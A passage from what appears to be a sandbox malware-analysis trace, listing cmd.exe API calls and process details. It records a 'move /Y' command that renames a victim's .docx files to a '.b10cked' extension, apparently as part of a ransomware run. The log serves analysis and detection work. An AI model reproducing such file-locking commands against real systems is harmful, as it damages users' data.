hFindFile=0xffff8 | out: hFindFile=0xffff8) returned 1 [0135.976] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f4fc | out: lpFindFileData=0x30f4fc) returned 0xffff8 [0135.976] FindClose (in: hFindFile=0xffff8 | out: hFindFile=0xffff8) returned 1 [0135.976] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f4fc | out: lpFindFileData=0x30f4fc) returned 0xffff8 [0135.976] FindClose (in: hFindFile=0xffff8 | out: hFindFile=0xffff8) returned 1 [0135.976] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.976] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0135.976] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0135.976] GetEnvironmentStringsW () returned 0x102ad8* [0135.976] FreeEnvironmentStringsW (penv=0x102ad8) returned 1 [0135.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.977] GetConsoleOutputCP () returned 0x1b5 [0135.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.977] GetUserDefaultLCID () returned 0x409 [0135.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0135.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f8c0, cchData=128 | out: lpLCData="0") returned 2 [0135.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f8c0, cchData=128 | out: lpLCData="0") returned 2 [0135.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f8c0, cchData=128 | out: lpLCData="1") returned 2 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0135.978] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.979] GetConsoleTitleW (in: lpConsoleTitle=0xf08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.979] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.979] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0135.979] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0135.979] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0135.980] _wcsicmp (_String1="move", _String2=")") returned 68 [0135.980] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0135.980] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0135.980] _wcsicmp (_String1="IF", _String2="move") returned -4 [0135.980] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0135.980] _wcsicmp (_String1="REM", _String2="move") returned 5 [0135.980] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0135.982] GetConsoleTitleW (in: lpConsoleTitle=0x30f5b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.983] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0135.983] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0135.983] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0135.983] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0135.983] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="CD") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0135.983] _wcsicmp (_String1="move", _String2="REN") returned -5 [0135.983] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0135.983] _wcsicmp (_String1="move", _String2="SET") returned -6 [0135.983] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0135.983] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0135.983] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0135.983] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0135.983] _wcsicmp (_String1="move", _String2="MD") returned 11 [0135.983] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0135.983] _wcsicmp (_String1="move", _String2="RD") returned -5 [0135.983] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0135.983] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0135.983] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0135.983] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0135.983] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0135.983] _wcsicmp (_String1="move", _String2="VER") returned -9 [0135.983] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0135.983] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0135.983] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0135.983] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0135.983] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0135.983] _wcsicmp (_String1="move", _String2="START") returned -6 [0135.983] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0135.983] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0135.983] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0135.985] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.985] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.985] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f374, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f36c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f36c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.986] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0135.986] _wcsicmp (_String1="D2POZD~1.DOC", _String2=".") returned 54 [0135.986] _wcsicmp (_String1="D2POZD~1.DOC", _String2="..") returned 54 [0135.986] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozd~1.doc")) returned 0x20 [0135.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x101d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.987] SetErrorMode (uMode=0x0) returned 0x0 [0135.987] SetErrorMode (uMode=0x1) returned 0x0 [0135.987] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", nBufferLength=0x104, lpBuffer=0x30ecfc, lpFilePart=0x30ece4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", lpFilePart=0x30ece4*="D2POZD~1.DOC") returned 0x26 [0135.987] SetErrorMode (uMode=0x0) returned 0x1 [0135.987] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0135.987] _wcsicmp (_String1="D2POZD~1.DOC", _String2=".") returned 54 [0135.987] _wcsicmp (_String1="D2POZD~1.DOC", _String2="..") returned 54 [0135.987] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozd~1.doc")) returned 0x20 [0135.987] SetErrorMode (uMode=0x0) returned 0x0 [0135.987] SetErrorMode (uMode=0x1) returned 0x0 [0135.987] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", nBufferLength=0x104, lpBuffer=0x30f178, lpFilePart=0x30ef10 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", lpFilePart=0x30ef10*="D2POZD~1.DOC") returned 0x26 [0135.988] SetErrorMode (uMode=0x0) returned 0x1 [0135.988] SetErrorMode (uMode=0x0) returned 0x0 [0135.988] SetErrorMode (uMode=0x1) returned 0x0 [0135.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked", nBufferLength=0x104, lpBuffer=0x30f380, lpFilePart=0x30ef10 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked", lpFilePart=0x30ef10*="D2poZdDEdi.docx.b10cked") returned 0x31 [0135.988] SetErrorMode (uMode=0x0) returned 0x1 [0135.988] SetLastError (dwErrCode=0x0) [0135.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozddedi.docx.b10cked")) returned 0xffffffff [0135.988] GetLastError () returned 0x2 [0135.988] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x30e88c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e88c) returned 0xf0f08 [0135.988] FindNextFileW (in: hFindFile=0xf0f08, lpFindFileData=0x30e88c | out: lpFindFileData=0x30e88c) returned 0 [0135.989] GetLastError () returned 0x12 [0135.989] FindClose (in: hFindFile=0xf0f08 | out: hFindFile=0xf0f08) returned 1 [0135.989] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x101ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x101ae0) returned 0xf0f08 [0135.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked", nBufferLength=0x104, lpBuffer=0x30eb24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked", lpFilePart=0x0) returned 0x31 [0135.990] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx", nBufferLength=0x104, lpBuffer=0x30eb24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx", lpFilePart=0x0) returned 0x29 [0135.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozddedi.docx")) returned 0x20 [0135.990] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozddedi.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozddedi.docx.b10cked"), dwFlags=0x3) returned 1 [0135.990] FindClose (in: hFindFile=0xf0f08 | out: hFindFile=0xf0f08) returned 1 [0135.990] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30ead8 | out: _Buffer=" 1") returned 9 [0135.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.990] GetFileType (hFile=0x7) returned 0x2 [0136.070] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.070] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ea64 | out: lpMode=0x30ea64) returned 1 [0136.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.070] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ea98 | out: lpConsoleScreenBufferInfo=0x30ea98) returned 1 [0136.070] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.070] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30ead8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.070] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30eabc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30eabc*=0x1a) returned 1 [0136.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.071] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.071] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.071] SetConsoleInputExeNameW () returned 0x1 [0136.071] GetConsoleOutputCP () returned 0x1b5 [0136.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.071] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.071] exit (_Code=0) Process: id = "138" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13674 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13675 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13676 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13677 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13678 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13679 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13680 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13681 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13682 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 13683 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14073 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14074 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14075 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14076 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 14077 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 14078 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14079 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14080 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14081 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14082 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14083 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14084 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14085 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14086 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14147 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14148 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14149 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14150 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 14151 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 14152 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14153 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 14154 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 14155 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 14156 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 195 os_tid = 0xc60 [0136.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb2c | out: lpSystemTimeAsFileTime=0x2cfb2c*(dwLowDateTime=0x8b2ee500, dwHighDateTime=0x1d440a9)) [0136.319] GetCurrentProcessId () returned 0xc5c [0136.319] GetCurrentThreadId () returned 0xc60 [0136.319] GetTickCount () returned 0x2b163 [0136.319] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb24 | out: lpPerformanceCount=0x2cfb24*=19310864905) returned 1 [0136.320] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.320] __set_app_type (_Type=0x1) [0136.320] __p__fmode () returned 0x76b331f4 [0136.320] __p__commode () returned 0x76b331fc [0136.320] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.320] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.321] GetCurrentThreadId () returned 0xc60 [0136.321] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc60) returned 0x38 [0136.321] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.321] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.321] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.324] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.324] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfabc | out: phkResult=0x2cfabc*=0x0) returned 0x2 [0136.325] VirtualQuery (in: lpAddress=0x2cfaf3, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.325] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.325] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.325] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.325] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0136.325] GetConsoleOutputCP () returned 0x1b5 [0136.327] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.327] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 